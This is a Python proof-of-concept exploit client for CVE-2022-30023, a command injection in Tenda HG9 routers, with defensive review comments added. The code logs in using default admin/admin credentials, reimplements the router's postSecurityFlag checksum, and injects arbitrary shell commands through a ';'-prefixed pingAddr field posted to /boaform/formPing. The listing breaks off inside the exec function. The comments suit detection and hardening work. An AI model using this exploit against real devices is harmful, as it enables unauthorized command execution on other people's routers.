# Proof-of-concept client for CVE-2022-30023 (Tenda HG9, authenticated command
# injection), per the argparse description below.
#
# NOTE(review): this listing arrived collapsed onto one line. Line breaks and
# indentation here are reconstructed from the syntax, and the file is cut off
# inside exec(), so everything after the last visible statement is unknown.
#
# Defensive reading of what the script shows:
#   * The injected value travels in the `pingAddr` form field of a POST to
#     /boaform/formPing, after a successful POST to /boaform/admin/formLogin.
#   * Every pingAddr this script sends starts with ';'. Web or proxy logs with
#     a pingAddr that is not a plain IP address or hostname are the thing to
#     alert on.
#   * The flaw is only reachable with valid credentials. Non-default router
#     credentials and a management interface that is not reachable from
#     untrusted networks limit exposure until the firmware validates pingAddr.
import requests
import argparse
import re
from urllib.parse import urlencode, quote_plus


def parseArgs():
    """Parse the command line: target URL, router username and router password.

    Returns the argparse namespace with `url`, `user` and `password`.
    """
    parser = argparse.ArgumentParser(description='CVE-2022-30023 - Tenda HG9 Authenticated Command Injection By Thiago Pontes (Haniwa0x01)')
    # All three options are required=True, so the default= values can never be
    # selected by omitting the option. With nargs='?', passing the flag without
    # a value yields None rather than the default.
    parser.add_argument('-u', '--url', nargs='?', type=str, required=True, default='127.0.0.1', help='url address')
    # admin/admin appear here as defaults; presumably these mirror the device's
    # factory credentials (confirm against vendor documentation).
    parser.add_argument('-U', '--user', nargs='?', default='admin', required=True, help='Username to login to the Router')
    parser.add_argument('-P', '--password', nargs='?', default='admin', required=True, help='Password to login to the Router')
    args = parser.parse_args()
    return args


def hash(inputVal):
    """Append a 16-bit `postSecurityFlag` checksum to a form body.

    The name shadows the builtin hash() for the rest of this module.

    The string is summed in 4-character groups, each packed as a big-endian
    32-bit word from the characters' code points. A trailing group of 1-3
    characters is packed into the high bytes with the missing low bytes left
    as zero. The sum is folded once to 16 bits and complemented.

    The flag is computed from the body text alone, with no key or
    session-bound value, so any client that knows the algorithm can produce
    it. It should not be treated as an authentication or anti-CSRF control.

    Returns inputVal + "postSecurityFlag=" + the decimal checksum. The visible
    caller passes a body that already ends in "&".
    """
    i = 0
    csum = 0
    while i < len(inputVal):
        if (i+4) > len(inputVal):
            # Fewer than four characters remain: add what is there, then stop.
            if i < len(inputVal):
                csum += (ord(inputVal[i]) << 24)
            if (i+1) < len(inputVal):
                csum += (ord(inputVal[i+1]) << 16)
            if (i+2) < len(inputVal):
                csum += (ord(inputVal[i+2]) << 8)
            break
        else:
            csum += (ord(inputVal[i]) << 24) + (ord(inputVal[i+1]) << 16) + (ord(inputVal[i+2]) << 8) + (ord(inputVal[i+3]))
            i += 4
    # NOTE(review): the fold is placed after the loop here. The original
    # indentation was lost, so confirm it was not meant to run per iteration.
    # Python ints do not wrap at 32 bits, so `csum >> 16` carries every bit
    # above bit 15 into the fold; the mask on the next line trims the result.
    csum = (csum & 0xffff) + (csum >> 16)
    csum = csum&0xffff
    csum = (~csum)&0xffff
    return inputVal + "postSecurityFlag=" + str(csum)


def login(host, data):
    """POST `data` to the router's login form and return the session on success.

    Success is decided by the marker text "BroadBand Device Webserver" in the
    response body. On failure the function returns the string "false", which
    is truthy, so callers must compare against "false" explicitly rather than
    testing the return value for truthiness.
    """
    url = (host + "/boaform/admin/formLogin")
    req = requests.Session()
    data = (data)
    # No timeout is passed, and requests does not apply one by default, so an
    # unresponsive host blocks this call indefinitely.
    page = req.post(url, data=data)
    if "BroadBand Device Webserver" in page.text:
        print("[!]: Logged!")
        return req
    else:
        print("[!]: Not logged!!!")
        return "false"


def logout(host, req):
    """POST the logout form using the session `req`. Returns None."""
    url = (host + "/boaform/admin/formLogout")
    data = ("save=Logout&submit-url=%2Flogin.asp")
    # Rebinding `req` to the response is local only; the caller's session
    # object is unchanged.
    req = req.post(url, data=data)


def exec(host, payload, req):
    # Shadows the builtin exec() for the rest of this module.
    #
    # Sends `payload` inside the ping form's `pingAddr` field, prefixed with
    # ';', to /boaform/formPing using the logged-in session `req`.
    # Presumably the device passes pingAddr to a shell command unescaped and
    # the ';' ends the intended ping invocation. That is what CVE-2022-30023
    # describes, but the device side is not visible here.
    url = (host + "/boaform/formPing")
    payload = {'pingAddr': f';{payload}', 'wanif':'65535', 'submit-url': '%2Fping.asp'}
    # urlencode() percent-encodes the '%' in the already-encoded '%2Fping.asp',
    # so the body carries submit-url=%252Fping.asp. That double encoding is a
    # distinguishing artifact of requests made by this script.
    result = urlencode(payload, quote_via=quote_plus)
    # hash() appends "postSecurityFlag=..." directly, so the separator is added
    # first.
    res = result + "&"
    csum = hash(res)
    page = req.post(url, data=csum).text
    # NOTE(review): the listing is cut off inside the next statement. The regex
    # and the remainder of this function are not visible.
    resp = re.findall(r"
(.*)